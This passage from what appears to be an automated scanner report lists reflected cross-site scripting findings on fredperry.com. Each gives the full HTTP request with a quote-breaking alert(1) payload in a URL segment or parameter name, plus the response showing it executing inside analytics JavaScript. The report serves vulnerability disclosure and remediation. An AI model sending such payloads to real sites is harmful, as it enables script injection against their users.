The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 24fed"-alert(1)-"4376cc421d6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /limited-edition24fed"-alert(1)-"4376cc421d6/women/shirts/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:18:54 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=3r53k1uir2nojsecqug4val937; expires=Tue, 09-Nov-2010 17:18:54 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29364

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/limited-edition24fed"-alert(1)-"4376cc421d6/women/shirts/");
//]]>
...[SNIP]...

1.187. http://www.fredperry.com/limited-edition/women/shirts/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/women/shirts/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 19601"-alert(1)-"aa600d1ea66 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /limited-edition/women19601"-alert(1)-"aa600d1ea66/shirts/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:19:13 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=bqm75d6efa21b78apj8pid2ip4; expires=Tue, 09-Nov-2010 17:19:13 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29364

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/limited-edition/women19601"-alert(1)-"aa600d1ea66/shirts/");
//]]>
...[SNIP]...

1.188. http://www.fredperry.com/limited-edition/women/shirts/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/women/shirts/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6b4ef"-alert(1)-"8619217da8a was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /limited-edition/women/shirts6b4ef"-alert(1)-"8619217da8a/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:19:41 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=28ijbt4pspljfvkbg1krqmmf86; expires=Tue, 09-Nov-2010 17:19:41 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29364

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/limited-edition/women/shirts6b4ef"-alert(1)-"8619217da8a/");
//]]>
...[SNIP]...

1.189. http://www.fredperry.com/limited-edition/women/shirts/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/women/shirts/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload aa3b5"-alert(1)-"13b0e4c6bfd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /limited-edition/women/shirts/?aa3b5"-alert(1)-"13b0e4c6bfd=1 HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:17:28 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=pt1ta4js8a2p84pfab7quviqo1; expires=Tue, 09-Nov-2010 17:17:28 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 38411

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> Fred Pe
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/limited-edition/women/shirts/?aa3b5"-alert(1)-"13b0e4c6bfd=1");
//]]>
...[SNIP]...

1.190. http://www.fredperry.com/limited-edition/women/shorts/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/women/shorts/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a3425"-alert(1)-"58b57485b7c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /limited-editiona3425"-alert(1)-"58b57485b7c/women/shorts/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:16:02 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=b9c99toatbkak9qdctggl2tgm1; expires=Tue, 09-Nov-2010 17:16:03 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29364

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/limited-editiona3425"-alert(1)-"58b57485b7c/women/shorts/");
//]]>
...[SNIP]...

1.191. http://www.fredperry.com/limited-edition/women/shorts/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/women/shorts/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 21758"-alert(1)-"0c629b616a9 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /limited-edition/women21758"-alert(1)-"0c629b616a9/shorts/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:16:18 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=oeoprbob6gvfv4g1sfdilovuj6; expires=Tue, 09-Nov-2010 17:16:18 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29364

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/limited-edition/women21758"-alert(1)-"0c629b616a9/shorts/");
//]]>
...[SNIP]...

1.192. http://www.fredperry.com/limited-edition/women/shorts/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/women/shorts/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 987c1"-alert(1)-"18bec130932 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /limited-edition/women/shorts987c1"-alert(1)-"18bec130932/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:16:37 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=9c2tjvetsb3nuc82tgrnhdpph7; expires=Tue, 09-Nov-2010 17:16:37 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29364

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/limited-edition/women/shorts987c1"-alert(1)-"18bec130932/");
//]]>
...[SNIP]...

1.193. http://www.fredperry.com/limited-edition/women/shorts/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/women/shorts/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ee86e"-alert(1)-"ca169360927 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /limited-edition/women/shorts/?ee86e"-alert(1)-"ca169360927=1 HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:14:55 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=9v6frfiehl9h83t9b8vh29f4v0; expires=Tue, 09-Nov-2010 17:14:55 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 34288

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> Fred Pe
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/limited-edition/women/shorts/?ee86e"-alert(1)-"ca169360927=1");
//]]>
...[SNIP]...

1.194. http://www.fredperry.com/limited-edition/women/skirts/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/women/skirts/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e6071"-alert(1)-"d29439e175 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /limited-editione6071"-alert(1)-"d29439e175/women/skirts/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:14:49 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=sij4c4sr0g9sobd42obfm75li6; expires=Tue, 09-Nov-2010 17:14:49 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29363

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/limited-editione6071"-alert(1)-"d29439e175/women/skirts/");
//]]>
...[SNIP]...

1.195. http://www.fredperry.com/limited-edition/women/skirts/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/women/skirts/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ec008"-alert(1)-"80aa6a98e3c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /limited-edition/womenec008"-alert(1)-"80aa6a98e3c/skirts/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:15:29 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=go8661utj997ijktrdilvrbo94; expires=Tue, 09-Nov-2010 17:15:29 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29364

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/limited-edition/womenec008"-alert(1)-"80aa6a98e3c/skirts/");
//]]>
...[SNIP]...

1.196. http://www.fredperry.com/limited-edition/women/skirts/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/women/skirts/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 361b2"-alert(1)-"f83ab23d34f was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /limited-edition/women/skirts361b2"-alert(1)-"f83ab23d34f/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:15:55 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=oei1spgobhg9om8dfjglfbemp2; expires=Tue, 09-Nov-2010 17:15:55 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29364

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/limited-edition/women/skirts361b2"-alert(1)-"f83ab23d34f/");
//]]>
...[SNIP]...

1.197. http://www.fredperry.com/limited-edition/women/skirts/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/women/skirts/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload af0b4"-alert(1)-"a8e2f292ac9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /limited-edition/women/skirts/?af0b4"-alert(1)-"a8e2f292ac9=1 HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:14:15 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=lkctfmg7af0li5fi70bo9nkir1; expires=Tue, 09-Nov-2010 17:14:15 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 30898

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> Fred Pe
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/limited-edition/women/skirts/?af0b4"-alert(1)-"a8e2f292ac9=1");
//]]>
...[SNIP]...

1.198. http://www.fredperry.com/limited-edition/women/trousers/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/women/trousers/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1b9eb"-alert(1)-"50f709e851f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /limited-edition1b9eb"-alert(1)-"50f709e851f/women/trousers/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:15:06 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=u06s68bsfnbfrbev1v8hrviv00; expires=Tue, 09-Nov-2010 17:15:06 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29366

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/limited-edition1b9eb"-alert(1)-"50f709e851f/women/trousers/");
//]]>
...[SNIP]...

1.199. http://www.fredperry.com/limited-edition/women/trousers/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/women/trousers/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1b902"-alert(1)-"e78c997e91a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /limited-edition/women1b902"-alert(1)-"e78c997e91a/trousers/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:15:34 GMT
